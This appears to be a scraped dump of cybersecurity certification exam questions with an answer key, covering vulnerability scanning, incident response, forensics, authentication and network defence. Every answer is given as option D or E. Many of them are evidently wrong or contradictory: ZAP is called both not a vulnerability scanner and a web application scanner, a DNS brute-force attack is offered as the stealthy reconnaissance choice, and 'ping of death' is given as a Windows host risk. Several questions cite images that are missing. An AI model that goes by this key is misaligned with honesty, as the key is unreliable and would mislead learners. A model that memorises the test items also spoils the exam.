A university wants to increase the security posture of its network by implementing vulnerability scans of both centrally managed and student/employee laptops.The solution should be able to scale, provide minimum false positives and high accuracy of results, and be centrally managed through an enterprise console.Which of the following scanning topologies is BEST suited for this environment? A. A passive scanning engine located at the core of the network infrastructure B. A combination of cloud-based and server-based scanning engines C. A combination of server-based and agent-based scanning engines D. An active scanning engine installed on the enterprise console
D. An active scanning engine installed on the enterprise console
What two techniques are commonly used by port and vulnerability scanners to perform services system identification? A. Comparing response fingerprints ans registry scanning B. Using the oslookup utility and UDP response timing C. Banner grabbing and UDP response timing D. Banner grabbing and comparing response fingerprints
D. Banner grabbing and comparing response fingerprints
Nick is participating in a security exercise as part of the network defense team for his organization. Which team is Nick playing on? A. Yellow Team B. Red Team C. White Team D. Blue Team
D. Blue Team
A cybersecurity professional typed in a URL and discovered the admin panel for the e-commerce application is accessible over the open web with the default password. Which of the following is the MOST secure solution to remediate this vulnerability? A. Rename the URL to a more obscure name, whitelist all corporate IP blocks, and require two-factor authentication. B. Change the default password, whitelist specific source IP addresses, and require two-factor authentication. C. Whitelist all corporate IP blocks, require an alphanumeric passphrase for the default password, and require two-factor authentication. D. Change the username and default password, whitelist specific source IP addresses, and require two-factor authentication.
D. Change the username and default password, whitelist specific source IP addresses, and require two-factor authentication
A forensic analyst needs to access a macOS encrypted drive that uses FileVault 2. Which of the following methods is NOT a means of unlocking the volume? A. Retrieve the key from memory while the volume is mounted B. Extract the keys from iCloud C. Acquire the recovery key D. Conduct a brute-force attack against the FileVault2 encryption
D. Conduct a brute-force attack against the FileVault2 encryption
A cybersecurity consultant is reviewing the following output from a vulnerability scan against a newly installed MS SQL Server 2012 that is slated to go into production in one week: (see image Q-105) Based on the above information, which of the following should the system administrator do? (Choose two.) A. Verify the vulnerability using penetration testing tools or proof-of-concept exploits. B. Review the references to determine if the vulnerability can be remotely exploited. C. Mark the result as a false positive so it will show in subsequent scans. D. Configure a network-based ACL at the perimeter firewall to protect the MS SQL port. E. Implement the proposed solution by installing Microsoft patch Q316333.
D. Configure a network-based ACL at the perimeter firewall to protect the MS SQL port E. Implement the proposed solution by installing Microsoft patch Q316333
The security operations team is conducting a mock forensics investigation. Which of the following should be the FIRST action taken after seizing a compromised workstation? A. Activate the escalation checklist B. Implement the incident response plan C. Analyze the forensic image D. Perform evidence acquisition
D. Perform evidence acquisition
Tony works for a company as a cybersecurity analyst. His company runs a website that allows public postings. Recently, users have started complaining about the website having pop-up messages asking for their username and password. Simultaneously, your security team has noticed there has been a large increase in the number of compromised user accounts on the system. What type of attack is most likely the cause of both of these events? A. Cross-site request forgery B. Rootkit C. SQL injection D. Cross-site scripting
D. Cross-site scripting
An investigation showed a worm was introduced from an engineer's laptop. It was determined the company does not provide engineers with company-owned laptops, which would be subject to company policy and technical controls.Which of the following would be the MOST secure control implement? A. Deploy HIDS on all engineer-provided laptops, and put a new router in the management network. B. Implement role-based group policies on the management network for client access. C. Utilize a jump box that is only allowed to connect to clients from the management network. D. Deploy a company-wide approved engineering workstation for management access.
D. Deploy a company-wide approved engineering workstation for management access
When network administrators observe an increased amount of web traffic without an increased number of financial transactions, the company is MOST likely experiencing which of the following attacks? A. Bluejacking B. ARP cache poisoning C. Phishing D. DoS
D. DoS
A security analyst notices PII has been copied from the customer database to an anonymous FTP server in the DMZ. Firewall logs indicate the customer database has not been accessed from anonymous FTP server. Which of the following departments should make a decision about pursuing further investigation? (Choose two.) A. Human resources B. Public relations C. Legal D. Executive management E. IT management
D. Executive management E. IT management
A cybersecurity analyst is currently investigating a server outage. The analyst has discovered the following value was entered for the username: 0xbfff601a. Which of the following attacks may be occurring? A. Buffer overflow attack B. Man-in-the-middle attack C. Smurf attack D. Format string attack E. Denial of service attack
D. Format String Attack
Which security control allows a Windows system administrator to efficiently manage system configuration settings across a large number of systems? A. Patch management B. HIPS C. Anti-malware D. GPO
D. GPO
The Chief Information Security Officer (CISO) has asked the security staff to identify a framework on which to base the security program. The CISO would like to achieve a certification showing the security program meets all required best practices. Which of the following would be the BEST choice? A. OSSIM B. SDLC C. SANS D. ISO
D. ISO
An organization is requesting the development of a disaster recovery plan. The organization has grown and so has its infrastructure. Documentation, policies, and procedures do not exist. Which of the following steps should be taken to assist in the development of the disaster recovery plan? A. Conduct a risk assessment. B. Develop a data retention policy. C. Execute vulnerability scanning. D. Identify assets.
D. Identify assets
A cybersecurity analyst is reviewing the current BYOD security posture. The users must be able to synchronize their calendars, email, and contacts to a smartphone or other personal device. The recommendation must provide the most flexibility to users. Which of the following recommendations would meet both the mobile data protection efforts and the business requirements described in this scenario? A. Develop a minimum security baseline while restricting the type of data that can be accessed. B. Implement a single computer configured with USB access and monitored by sensors. C. Deploy a kiosk for synchronizing while using an access list of approved users. D. Implement a wireless network configured for mobile device access and monitored by sensors.
D. Implement a wireless network configured for mobile device access and monitored by sensors
During an investigation, a computer is being seized. Which of the following is the FIRST step the analyst should take? A. Power off the computer and remove it from the network. B. Unplug the network cable and take screenshots of the desktop. C. Perform a physical hard disk image. D. Initiate chain-of-custody documentation.
D. Initiate chain-of-custody documentation
A cybersecurity analyst is reviewing the logs of a proxy server and saw the following URLs:-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-https://test.diontraining.com/profile.php?userid=1546 https://test.diontraining.com/profile.php?userid=5482 https://test.diontraining.com/profile.php?userid=3618-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-What type of vulnerability does this website have? A. Race condition B. Improper error handling C. Weak or default configurations D. Insecure direct object reference
D. Insecure direct object reference
You just finished conducting a remote scan of a class C network block using the following command "nmap -sS 202.15.73.0/24". The results only showed a single web server. Which of the following techniques would allow you to gather additional information about the network? A. Use an IPS evasion technique B. Scan using the -p 1-65535 fkag C. Use a UDP scan D. Perform a scan from on-site
D. Perform a scan from on-site
You have been asked to recommend a capability to monitor all of the traffic entering and leaving the corporate network's default gateway. Additionally, the company's CIO requests the ability to block certain types of content before it leaves the network based on operational priorities. Which of the following solution should you recommend to meet these requirements? A. Configure IP filtering on the internal and external interfaces of the router B. Installation of a NIPS on both the internal ans external interfaces of the router C. Install a firewall on the router's internal interface and a NIDS on the router's external interface D. Install a NIPS on the internal interface and a firewall on the external interface of the router
D. Install a NIPS on the internal interface and a firewall on the external interface of the router
A nuclear facility manager determined the need to monitor utilization of water within the facility. A startup company just announced a state-of-the-art solution to address the need for integrating the business and ICS network. The solution requires a very small agent to be installed on the ICS equipment. Which of the following is the MOST important security control for the manager to invest in to protect the facility? A. Run a penetration test on the installed agent. B. Require that the solution provider make the agent source code available for analysis. C. Require thorough guides for administrator and users. D. Install the agent for a week on a test system and monitor the activities.
D. Install the agent for a week on a test system and monitor the activities
An analyst has initiated an assessment of an organization's security posture. As a part of this review, the analyst would like to determine how much information about the organization is exposed externally. Which of the following techniques would BEST help the analyst accomplish this goal? (Choose two.) A. Fingerprinting B. DNS query log reviews C. Banner grabbing D. Internet searches E. Intranet portal reviews F. Sourcing social network sites G. Technical control audits
D. Internet searches F. Sourcing social network sites
An organization wants to choose an authentication protocol that can be used over an insecure network without having to implement additional encryption services. Which of the following protocols should they choose? A. RADIUS B. TACACS+ C. TACACS D. Kerberos
D. Kerberos
A security analyst discovers a network intrusion and quickly solves the problem by closing an unused port. Which of the following should be completed? A. Vulnerability report B. Memorandum of agreement C. Reverse-engineering incident report D. Lessons learned report
D. Lessons learned report
Which of the following items represents a document that includes detailed information on when an incident was detected, how impactful the incident was, and how it was remediated, in addition to incident response effectiveness and any identified gaps needing improvement? A. Forensic analysis report B. Chain of custody report C. Trends analysis report D. Lessons learned report
D. Lessons learned report
Annah is deploying a new application that she received from a vendor, but she is unsure if the hardware is adequate to support a large number of users during peak usage periods. What type of testing could Annah perform to determine if the application will support the required number of users? A. Regression Testing B. Fuzz Testing C. User Acceptance Testing D. Load Testing
D. Load Testing
Stephane was asked to assess the technical impact of a reconnaissance performed against his organization. He has discovered that a third party has been performing reconnaissance by querying the organization's WHOIS data. Which category of technical impact should he classify this as? A. Medium B. High C. Critical D. Low
D. Low
Company A permits visiting business partners from Company B to utilize Ethernet ports available in Company A's conference rooms. This access is provided to allow partners the ability to establish VPNs back to Company B's network. The security architect for Company A wants to ensure partners from Company B are able to gain direct Internet access from available ports only, while Company A employees can gain access to the Company A internal network from those same ports. Which of the following can be employed to allow this? A. ACL B. SIEM C. MAC D. NAC E. SAML
D. NAC
Randy is preparing his organization for their required quarterly PCI DSS external vulnerability scan. Who is authorized to perform this type of scan? A. Any qualified individual B. Anyone C. Only employees of the organization D. Only an approved scanning vedor
D. Only an approved scanning vendor
Which type of monitoring would utilize a network tap? A. SNMP B. Router-based C. Active D. Passive
D. Passive
Marta's organization is concerned with the vulnerability of a user's account being vulnerable for an extended period of time if their password was compromised. Which of the following controls should be configured as part of their password policy to minimize this vulnerability? A. Minimum password length B. Password complexity C. Password history D. Password expiration
D. Password expiration
A security analyst performed a review of an organization's software development life cycle. The analyst reports that the life cycle does not contain a phase in which team members evaluate and provide critical feedback on another developer's code. Which of the following assessment techniques is BEST for describing the analyst's report? A. Architectural evaluation B. Waterfall C. Whitebox testing D. Peer review
D. Peer review
A project lead is reviewing the statement of work for an upcoming project that is focused on identifying potential weaknesses in the organization's internal and external network infrastructure. As part of the project, a team of external contractors will attempt to employ various attacks against the organization. The statement of work specifically addresses the utilization of an automated tool to probe network resources in an attempt to develop logical diagrams indication weaknesses in the infrastructure.The scope of activity as described in the statement of work is an example of: A. session hijacking B. vulnerability scanning C. social engineering D. penetration testing E. friendly DoS
D. Penetration testing
As part of the reconnaissance stage of a penetration test, Kumar wants to retrieve some information about an organization's network infrastructure without causing an IPS alert. Which of the following is his best course of action? A. Use a nmap stealth scan B. Use a nmap ping sweep C. Perform a DNS zone transfer D. Perform a DNS brute-force attack
D. Perform a DNS brute-force attack
A threat intelligence analyst is researching a new indicator of compromise. At the same time, the web proxy server-generated an alert for this same indicator of compromise. When asked about this alert, the analyst insists that they did not visit any of the related sites, but instead they were simply listed in the results page of their search engine query. Which of the following is the BEST explanation for what has occurred? A. A link related to the indicator was accidentally clicked by the analyst B. Alert is unrelated to the search that was conducted C. The standard approved browser was not being used by the analyst D. Prefetch is enabled on the analyst web browser
D. Prefetch is enabled on the analyst web browser
What party in a federation provides services to members of the federation? A. IdP B. AP C. IP D. RP
D. RP
In order to meet regulatory compliance objectives for the storage of PHI, vulnerability scans must be conducted on a continuous basis. The last completed scan of the network returned 5,682 possible vulnerabilities. The Chief Information Officer (CIO) would like to establish a remediation plan to resolve all known issues.Which of the following is the BEST way to proceed? A. Attempt to identify all false positives and exceptions, and then resolve all remaining items. B. Hold off on additional scanning until the current list of vulnerabilities have been resolved. C. Place assets that handle PHI in a sandbox environment, and then resolve all vulnerabilities. D. Reduce the scan to items identified as critical in the asset inventory, and resolve these issues first.
D. Reduce the scan to items identified as critical in the asset inventory, and resolve these issues first
A penetration tester has been hired to conduct an assessment, but the company wants to exclude social engineering from the list of authorized activities. Which of the following documents would include this limitation? A. Memorandum of understanding B. Acceptable use policy C. Service level agreement D. Rules of engagement
D. Rules of engagement
A company invested ten percent of its entire annual budget in security technologies. The Chief Information Officer (CIO) is convinced that, without this investment, the company will risk being the next victim of the same cyber attack its competitor experienced three months ago. However, despite this investment, users are sharing their usernames and passwords with their coworkers to get their jobs done. Which of the following will eliminate the risk introduced by this practice? A. Invest in and implement a solution to ensure non-repudiation B. Force a daily password change C. Send an email asking users not to share their credentials D. Run a report on all users sharing their credentials and alert their managers of further actions
D. Run a report on all users sharing their credentials and alert their managers of further actions
Which of the following is MOST effective for correlation analysis by log for threat management? A. PCAP B. SCAP C. IPS D. SIEM
D. SIEM
A security analyst was asked to join an outage call for a critical web application. The web middleware support team determined the web server is running and having no trouble processing requests; however, some investigation has revealed firewall denies to the web server that began around 1.00 a.m. that morning. An emergency change was made to enable the access, but management has asked for a root cause determination. Which of the following would be the BEST next step? A. Install a packet analyzer near the web server to capture sample traffic to find anomalies. B. Block all traffic to the web server with an ACL. C. Use a port scanner to determine all listening ports on the web server. D. Search the logging servers for any rule changes.
D. Search the logging servers for any rule change
After a recent security breach, it was discovered that a developer had promoted code that had been written to the production environment as a hotfix to resolve a user navigation issue that was causing issues for several customers. The code had inadvertently granted administrative privileges to all users, allowing inappropriate access to sensitive data and reports. Which of the following could have prevented this code from being released into the production environment? A. Cross training B. Succession planning C. Automated reporting D. Separation of duties
D. Separation of duties
Jonathan's team completed the first phase of their incident response process. They are currently assessing the time to recover from the incident. Using the NIST recoverability effort categories, the team has decided that they can predict the time to recover, but this requires additional resources. How should he categorize this using the NIST model? A. Extended B. Regular C. Non-recoverable D. Supplemented
D. Supplemented
Datacenter access is controlled with proximity badges that record all entries and exits from the datacenter.The access records are used to identify which staff members accessed the data center in the event of equipment theft.Which of the following MUST be prevented in order for this policy to be effective? A. Password reuse B. Phishing C. Social engineering D. Tailgating
D. Tailgating
A security analyst is reviewing logs and discovers that a company-owned computer issued to an employee is generating many alerts and warnings. The analyst continues to review the log events and discovers that a non-company-owned device from a different, unknown IP address is generating the same events. The analyst informs the manager of these findings, and the manager explains that these activities are already known and part of an ongoing events. Given this scenario, which of the following roles are the analyst, the employee, and the manager filling? A. The analyst is red team. The employee is blue team. The manager is white team. B. The analyst is white team. The employee is red team. The manager is blue team. C. The analyst is red team. The employee is white team. The manager is blue team. D. The analyst is blue team. The employee is red team. The manager is white team.
D. The analyst is blue team, the employee is red team, the manager is white team
You are creating a script to filter some logs so that you can detect any suspected malware beaconing. Which of the following is NOT a typical means of identifying a malware beacons behavior on the network? A. The removal of known traffic B. The beacon's persistence C. The beaconing interval D. The beacon's protocol
D. The beacon's protocol
A company has been a victim of multiple volumetric DoS attacks. Packet analysis of the offending traffic shows the following: (see image Q-121) Which of the following mitigation techniques is MOST effective against the above attack? A. The company should contact the upstream ISP and ask that RFC1918 traffic be dropped. B. The company should implement a network-based sinkhole to drop all traffic coming from 192.168.1.1 at their gateway router. C. The company should implement the following ACL at their gateway firewall: DENY IP HOST 192.168.1.1 170.43.30.0/24. D. The company should enable the DoS resource starvation protection feature of the gateway NIPS.
D. The company should enable the DoS resource starvation protection feature of the gateway NIPS
The business has been informed of a suspected breach of customer data. The internal audit team, in conjunction with the legal department, has begun working with the cybersecurity team to validate the report. To which of the following response processes should the business adhere during the investigation? A. The security analysts should not respond to internal audit requests during an active investigation B. The security analysts should report the suspected breach to regulators when an incident occurs C. The security analysts should interview system operators and report their findings to the internal auditors D. The security analysts should limit communication to trusted parties conducting the investigation
D. The secuirty analysts should limit communiction to trusted parties conducing the investigation
A malware infection spread to numerous workstations within the marketing department. The workstations were quarantined and replaced with machines.Which of the following represents a FINAL step in the eradication of the malware? A. The workstations should be isolated from the network. B. The workstations should be donated for reuse. C. The workstations should be reimaged. D. The workstations should be patched and scanned.
D. The workstations should be patched an scanned
You have been asked to conduct a forensic disk image on an internal 500 GB hard drive. You connect a write blocker to the drive and begin to image it using dd to copy the contents to an external 500 GB USB hard drive. Before completing the image, the tool reports that the imaging failed. Which of the following is most likely the reason for the imaging failure? A. The data cannot be copied using the RAW format B. The source drive is encrypted with BitLocker C. The data on the source drive was modified during the imaging D. There are bad sectors on the destination drive
D. There are bad sectors on the destination drive
A technician receives the following security alert from the firewall's automated system: (see image Q-143) After reviewing the alert, which of the following is the BEST analysis? A. This alert is a false positive because DNS is a normal network function. B. This alert indicates a user was attempting to bypass security measures using dynamic DNS. C. This alert was generated by the SIEM because the user attempted too many invalid login attempts. D. This alert indicates an endpoint may be infected and is potentially contacting a suspect host.
D. This alert indicates an endpoint may be infected and is potentially contacting a suspected host
The Chief Security Officer (CSO) has requested a vulnerability report of systems on the domain, identifying those running outdated OSs. The automated scan reports are not displaying OS version details, so the CSO cannot determine risk exposure levels from vulnerable systems. Which of the following should the cybersecurity analyst do to enumerate OS information as part of the vulnerability scanning process in the MOST efficient manner? A. Execute the ver command B. Execute the nmap ""p command C. Use Wireshark to export a list D. Use credentialed configuration
D. Use credentialed configuration
Which of the following vulnerabilities involves leveraging access from a single virtual machine to other machines on a hypervisor? A. VM sprawl B. VM migration C. VM data remnant D. VM escape
D. VM escape
A cybersecurity consultant found common vulnerabilities across the following services used by multiple servers at an organization: VPN, SSH, and HTTPS. Which of the following is the MOST likely reason for the discovered vulnerabilities? A. Leaked PKI private key B. Vulnerable version of OpenSSL C. Common initialization vector D. Weak level of encryption entropy E. Vulnerable implementation of PEAP
D. Weak level of encryption entropy
Which of the following is a vulnerability when using Windows as a host OS for virtual machines? A. Windows requires frequent patching. B. Windows virtualized environments are typically unstable. C. Windows requires hundreds of open firewall ports to operate. D. Windows is vulnerable to the "ping of death".
D. Windows is vulnerable to the "ping of death"
What is NOT a vulnerability scanning tool? A. Nexpose B. Nessus C. QualysGuard D. Zap
D. Zap
Which of the following tools is considered a web application scanner? A. Qualys B. Nessus C. OpenVAS D. Zap
D. Zap
What tool is used to collect memory data for forensic analysis on a Linux system? A. EnCase B. DumplTt C. WinPMem D. fmem
D. fmem
Company A's security policy states that only PKI authentication should be used for all SSH accounts. A security analyst from Company A is reviewing the following auth.log and configuration settings: (see image Q-237) Which of the following changes should be made to the following sshd_config file to establish compliance with the policy? A. Change PermitRootLogin no to #PermitRootLogin yes B. Change ChallengeResponseAuthentication yes to ChallangeResponseAuthentication no C. Change PubkeyAuthentication yes to #PubkeyAuthentication yes D. Change #AuthorizedKeysFile $h/.ssh/authorized_keys to AuthorizedKeysFile $h/.ssh/authorized_keys E. Change PassworAuthentication yes to PasswordAuthentication no
E. Change PasswordAuthentication yes to Password Authentication no
A security analyst is performing a review of Active Directory and discovers two new user accounts in the accounting department. Neither of the users has elevated permissions, but accounts in the group are given access to the company's sensitive financial management application by default. Which of the following is theBEST course of action? A. Follow the incident response plan for the introduction of new accounts B. Disable the user accounts C. Remove the accounts' access privileges to the sensitive application D. Monitor the outbound traffic from the application for signs of data exfiltration E. Confirm the accounts are valid and ensure role-based permissions are appropriate
E. Confirm the accounts are valid and ensure role-based permissions are appropriate
What containment technique is the strongest possible response to an incident? A. Segmentation B. Isolating affected systems C. Isolating the attacker D. Removal
d. Removal